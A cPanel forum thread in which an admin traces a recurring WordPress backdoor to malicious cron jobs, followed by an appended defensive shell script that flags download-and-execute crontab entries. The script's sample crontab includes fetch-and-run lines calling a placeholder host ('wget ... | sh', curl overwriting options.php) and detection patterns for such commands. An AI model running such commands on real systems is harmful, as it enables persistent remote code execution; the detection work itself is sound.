Server infected, ImunifyAV says SMW-BLKH-1485227-php.bkdr

Operating System & Version
CentOS 7
cPanel & WHM Version
11.104.0.7

Nige_P

Registered
Jul 29, 2022
UK
cPanel Access Level
Root Administrator
When I run ImunifyAV it says the file /home/.../public_html/wp-includes/options.php is infected by SMW-BLKH-1485227-php.bkdr. Google doesn't show any hits for it.

I can delete the file but if I refresh the folder it reappears again minutes later.

I have no idea how to find the running program that is creating this file and how to then remove it. I can attach the file if necessary, but don't want to get flagged for attaching an 'infected' file.


The cPanel Security Advisor scan shows everything as green and up to date.

Please advise on what further details I need to share so I can fix this.

Thanks.
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
Hey there! Both myself and the backup technician that works forums ended up with the same days off, and Forums aren't usually staffed over the weekend, so that's why you had a longer-than-normal delay getting that approved.

Can you post the resolution you found?
 

Nige_P

Registered
Jul 29, 2022
UK
cPanel Access Level
Root Administrator
Ahhhhh, just bad timing.

It started sending spam emails and I was contacted by my host informing me I had to resolve the issue immediately.

Turned out there were several cron jobs which downloaded the infected files and copied them to the folder above.

Removed all the tasks from the cron queue, deleted the injected files and it's showing as clean.

I still have no idea how the server was infected in the first place; I always ensure the latest patches and plugins are installed.

Not being able to quickly turn off outgoing mail was frustrating; an option to do so in cPanel would be useful for situations like this. I had to stop the mail processes and edit php.ini to disable the mail processes.
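The cron-job cleanup Nige_P describes above, as an added example (this is not code from the thread, from cPanel or from Imunify): a small POSIX shell triage script that flags crontab entries which fetch remote content or pipe it into an interpreter, so an admin can review every user's cron queue before deleting anything. The sample crontab is constructed, and the host EXAMPLE-BAD-HOST and account EXAMPLE-USER are placeholders; the only assumption about the system is that it is a CentOS 7 cPanel box with POSIX sh and awk.

```shell
#!/bin/sh
# Added example, not code from the thread or from cPanel/Imunify: a triage
# helper for the situation described in the thread, where cron entries keep
# re-downloading a flagged file into public_html. It flags crontab lines that
# fetch remote content or pipe it into an interpreter. Assumes POSIX sh and
# awk; on CentOS 7 the live crontabs are /etc/crontab, /etc/cron.d/* and
# /var/spool/cron/<user> (the last needs root to read).

# Print crontab lines (read from stdin) that match download-and-execute
# patterns. Comments and blank lines are skipped; each line is printed once.
flag_cron_lines() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                 # comment or blank line
        /(curl|wget)[^|;]*https?:\/\// { print; next }   # fetches a URL
        /\|[ \t]*(sh|bash|php)([ \t]|$)/ { print; next }  # pipes output into an interpreter
        /base64[ \t]+(-d|--decode)/ { print; next }       # decodes an embedded payload
    '
}

# Number of flagged lines in the crontab text on stdin (always prints a number,
# so it is safe to use in a command substitution under set -e).
count_flagged() {
    flag_cron_lines | awk 'END { print NR }'
}

# Walk the real cron locations and print "<file>: <line>" for each flagged
# entry. Files that are unreadable (e.g. when not running as root) are skipped.
scan_system_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/*; do
        [ -r "$f" ] || continue
        flag_cron_lines < "$f" | while IFS= read -r line; do
            printf '%s: %s\n' "$f" "$line"
        done
    done
}

# Constructed sample crontab (not a real capture): two legitimate cPanel/WordPress
# entries plus two of the kind that re-create a file every few minutes.
SAMPLE_CRONTAB='# constructed sample; EXAMPLE-BAD-HOST and EXAMPLE-USER are placeholders
0 2 * * * /usr/local/cpanel/bin/backup --force
*/5 * * * * curl -s http://EXAMPLE-BAD-HOST/o.txt -o /home/EXAMPLE-USER/public_html/wp-includes/options.php
*/10 * * * * wget -qO- http://EXAMPLE-BAD-HOST/x.sh | sh
30 1 * * * php /home/EXAMPLE-USER/public_html/wp-cron.php
'

# Stand-alone run: show what the rules pick out of the sample, then scan the host.
printf '%s' "$SAMPLE_CRONTAB" | flag_cron_lines
scan_system_cron
```

Running it on the sample prints only the curl and wget entries; the backup and wp-cron entries pass through untouched. For the original question of which process keeps re-creating the file, the same triage can be paired with an audit watch on the path (`auditctl -w /home/<account>/public_html/wp-includes/options.php -p wa -k wp_backdoor`, then `ausearch -k wp_backdoor` after the file reappears), which records the writing process and its parent; in this thread that would have pointed straight at crond. As Nige_P notes, clearing the cron queue removes the persistence but not the original foothold, so the flagged entries are worth keeping as evidence of when the compromise started.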
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
cPanel Access Level
Root Administrator
We have an API call you can use to suspend mail:


so that could be of use in the future if that happens again.